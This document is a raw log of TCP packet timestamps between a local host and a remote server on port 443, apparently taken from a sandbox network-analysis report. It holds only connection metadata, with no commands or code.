                                                                                                                                                                        Oct 23, 2024 17:26:58.622993946 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.632946014 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.633023977 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.633066893 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.633260965 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.633260965 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.633271933 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.633750916 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.633806944 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.633815050 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.634195089 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.634248018 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.634254932 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.674848080 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.674897909 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.674940109 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.675060987 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.675076962 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.675164938 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.715500116 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.733166933 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.733226061 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.733227015 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.733249903 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.733295918 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.739166975 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.740008116 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.740062952 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.740081072 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.750320911 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.750371933 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.750385046 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.750401974 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.750442982 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.750452042 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.750612020 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.750643969 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.750658989 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.750664949 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.750704050 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.751841068 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.751907110 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.752048016 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.752058029 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.792289972 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.792485952 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.792500019 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.836049080 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.836354017 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.836373091 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.849345922 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.849687099 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.849708080 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.856389999 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.856524944 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.856543064 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.857116938 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.857157946 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.857208014 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.857218027 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.857326031 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.868309021 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.868400097 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.868427992 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.868550062 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.868575096 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.868772030 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.868805885 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.868918896 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.868928909 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.868980885 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.869568110 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.869745970 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.869796991 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.869806051 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.909032106 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.909203053 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.909230947 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.951859951 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.952029943 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.952055931 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.966392994 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.966598988 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.966624022 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.973572016 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.973885059 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.973911047 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.974592924 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.974745035 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.974755049 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.985603094 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.985630989 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.985657930 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.985723972 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.985743046 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.985785007 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.985817909 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.985836029 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.985843897 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.986171007 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.986835003 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.986867905 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.986902952 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.986918926 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.986929893 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.987334013 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.987373114 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:58.987447023 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:58.987457037 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.026257992 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.026639938 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.026659966 CEST44349172216.58.212.129192.168.2.22
Oct 23, 2024 17:26:59.069389105 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.069592953 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.069612980 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.083730936 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.084002972 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.084017038 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.090660095 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.090784073 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.090801954 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.091656923 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.091726065 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.091734886 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.102691889 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.102745056 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.102775097 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.102819920 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.102847099 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.102999926 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.102999926 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.103010893 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.103276014 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.103311062 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.103462934 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.103491068 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.103544950 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.103553057 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.103652000 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.104180098 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.104240894 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.104348898 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.104356050 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.143436909 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.143800974 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.143810987 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.186587095 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.187273979 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.187283993 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.200790882 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.201687098 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.201694965 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.207770109 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.207921028 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.207930088 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.208621025 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.208772898 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.208780050 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.219582081 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.219739914 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.219774008 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.219805956 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.219814062 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.219824076 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.219909906 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.219909906 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.220030069 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.220101118 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.220236063 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.220243931 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.220846891 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.220917940 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.220923901 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.220979929 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.221014023 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.221066952 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.221075058 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.221164942 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.224713087 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.260883093 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.260979891 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.261015892 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.261107922 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.261122942 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.261368036 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.303770065 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.317770958 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.317811012 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.317862034 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.317879915 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.318013906 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.324896097 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.325649977 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.325701952 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.325719118 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.325731039 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.325805902 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.336786032 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.336855888 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.336884022 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.336913109 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.336949110 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.336962938 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.336962938 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.336977005 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.337400913 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.337407112 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.337543011 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.337611914 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.337618113 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.337845087 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.337891102 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.337898970 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.337915897 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.337966919 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.338001013 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.377979040 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.378015995 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.378119946 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.378171921 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.378191948 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.378242970 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.432296038 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.435069084 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.435111046 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.435328007 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.435344934 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.442101002 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.442305088 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.442322969 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.442715883 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.442780018 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.442794085 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.453809977 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.453846931 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.453875065 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.453903913 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.453934908 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.454006910 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.454019070 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.454019070 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.454029083 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.454118967 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.454293013 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.454339981 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.454400063 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.454406977 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.454833031 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.454864025 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.455066919 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.455075026 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.455130100 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.494921923 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.494985104 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.495011091 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.495035887 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.495095968 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.495440960 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.495460987 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.495564938 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.538121939 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.552460909 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.552499056 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.552829027 CEST  49172  443    192.168.2.22    216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.552851915 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.559151888 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.559184074 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.559298992 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.559318066 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.559781075 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.559837103 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.559859991 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.570674896 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.570763111 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.570785046 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.570838928 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.570838928 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.570853949 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.571271896 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.571340084 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.571347952 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.571547985 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.571573019 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.571655989 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.571665049 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.571752071 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.571983099 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.572046041 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.572108984 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.572118044 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.612091064 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.612129927 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.612162113 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.612234116 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.612283945 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.612318993 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.612343073 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.612380981 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.612622023 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.613369942 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.613379955 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.613668919 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.655327082 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.655386925 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.655750036 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.655775070 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.669542074 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.669775963 CEST49172443192.168.2.22216.58.212.129
